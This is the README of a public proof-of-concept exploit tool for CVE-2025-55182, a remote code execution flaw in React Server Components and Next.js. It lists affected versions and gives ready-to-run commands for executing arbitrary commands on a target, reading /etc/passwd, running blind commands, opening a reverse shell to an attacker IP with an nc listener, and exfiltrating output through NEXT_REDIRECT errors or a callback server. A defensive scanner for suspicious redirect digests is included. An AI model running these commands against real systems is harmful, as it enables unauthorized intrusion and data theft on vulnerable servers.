p3ta00/react2shell-poc
# React2Shell - CVE-2025-55182 PoC
Proof of Concept for **CVE-2025-55182**, a critical unauthenticated Remote Code Execution vulnerability in React Server Components.
**CVSS Score:** 10.0 (Critical)
## Vulnerability
### Affected Versions
| Product | Vulnerable | Patched |
|---------|------------|---------|
| React | 19.0.0 - 19.2.0 | 19.0.1, 19.1.2, 19.2.1+ |
| Next.js | 14.3.0-canary.77 - 16.x | 15.0.5, 15.1.9, 15.2.6, 16.0.7+ |
## Installation
```bash
git clone https://github.com/p3ta00/react2shell-poc.git
cd react2shell-poc
pip install requests
```
## Usage
### Command Execution with Output (Default - Error-Based Exfiltration)
Output is returned directly in the HTTP response via a `NEXT_REDIRECT` error - **no callback server needed**.
```bash
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"
python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd"
```
### Interactive Mode
```bash
python3 react2shell-poc.py -t http://TARGET:3000 -i
```
### Check Vulnerability
```bash
python3 react2shell-poc.py -t http://TARGET:3000 --check
```
### Blind RCE (No Output)
```bash
python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind
```
### Reverse Shell
```bash
# Start listener
nc -lvnp 4444
# Send payload
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444
```
### Legacy: Callback-Based Exfiltration
```bash
python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP
```
## Options
```
-t, --target       Target URL (required)
-c, --command      Command to execute (output via error-based exfil by default)
--check            Check if target is vulnerable
--blind            Blind RCE mode (no output capture)
--listen           Use callback server instead of error-based exfil
-i, --interactive  Interactive pseudo-shell mode
--revshell         Attempt reverse shell
--lhost            Attacker IP for callbacks/reverse shell
--lport            Callback port (default: 9999)
--callback         Manual callback URL
--timeout          Request timeout in seconds (default: 30)
```
## How It Works
The default exfiltration method uses **NEXT_REDIRECT error injection**:
1. Execute command and capture output
2. Throw a `NEXT_REDIRECT` error with output in `digest` field
3. Next.js serializes the error in the Flight response
4. Output appears directly in HTTP response body
This is more reliable than callback-based exfiltration because it doesn't require outbound network access from the target.
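A defender-side check for the channel described above, as an added example that is not part of this repository: it scans a captured response body for Flight error rows whose `NEXT_REDIRECT` digest does not look like a framework-generated redirect. The row shape (`<id>:E{json}`), the legitimate digest layout and the length threshold are assumptions to verify against the Next.js version you run; the sample bodies are constructed.

```python
import json
import re

# Assumption: a Flight error row is "<hex id>:E<json>" on a line of its own.
ERROR_ROW = re.compile(r"^[0-9a-f]+:E(\{.*\})\r?$", re.MULTILINE)
# Assumption: a framework redirect digest is "NEXT_REDIRECT;<type>;<url>;<status>;".
REDIRECT_TYPES = {"push", "replace"}
REDIRECT_STATUSES = {"303", "307", "308"}
MAX_DIGEST_LEN = 512  # hypothetical threshold, tune for your application

def digest_anomalies(digest):
    """Return the reasons a NEXT_REDIRECT digest does not look framework-made."""
    parts = digest.split(";")
    if len(parts) < 5 or parts[0] != "NEXT_REDIRECT" or parts[-1] != "":
        return ["unexpected field layout"]
    # The URL itself may contain ';', so take everything between type and status.
    rtype, url, status = parts[1], ";".join(parts[2:-2]), parts[-2]
    reasons = []
    if rtype not in REDIRECT_TYPES:
        reasons.append("unknown redirect type")
    if status not in REDIRECT_STATUSES:
        reasons.append("unknown status code")
    if re.search(r"[\s\x00-\x1f]", url):
        reasons.append("whitespace or control characters in redirect target")
    if len(digest) > MAX_DIGEST_LEN:
        reasons.append("digest longer than threshold")
    return reasons

def scan_flight_body(body):
    """Return (digest, reasons) for each suspicious NEXT_REDIRECT error row."""
    findings = []
    for match in ERROR_ROW.finditer(body):
        try:
            digest = json.loads(match.group(1)).get("digest")
        except ValueError:
            continue  # payload after the E tag is not JSON; skip the row
        if isinstance(digest, str) and digest.startswith("NEXT_REDIRECT"):
            reasons = digest_anomalies(digest)
            if reasons:
                findings.append((digest, reasons))
    return findings

# Constructed sample bodies (not captured traffic).
BENIGN = '0:{"a":"$@1"}\n1:E{"digest":"NEXT_REDIRECT;replace;/login;307;"}\n'
SUSPECT = '1:E{"digest":"NEXT_REDIRECT;push;uid=1000(app) gid=1000(app);307;"}\n'
APP_ERROR = '2:E{"digest":"2893475612"}\n'
```

A hit is a lead for investigation rather than proof, since an application can legitimately redirect to unusual targets.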
## References
- [Wiz Security - React2Shell Disclosure](https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182)
- [Datadog Security Labs Analysis](https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/)
- [NVD - CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
## Disclaimer
This tool is for **authorized security testing and educational purposes only**. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing.
## Author
p3ta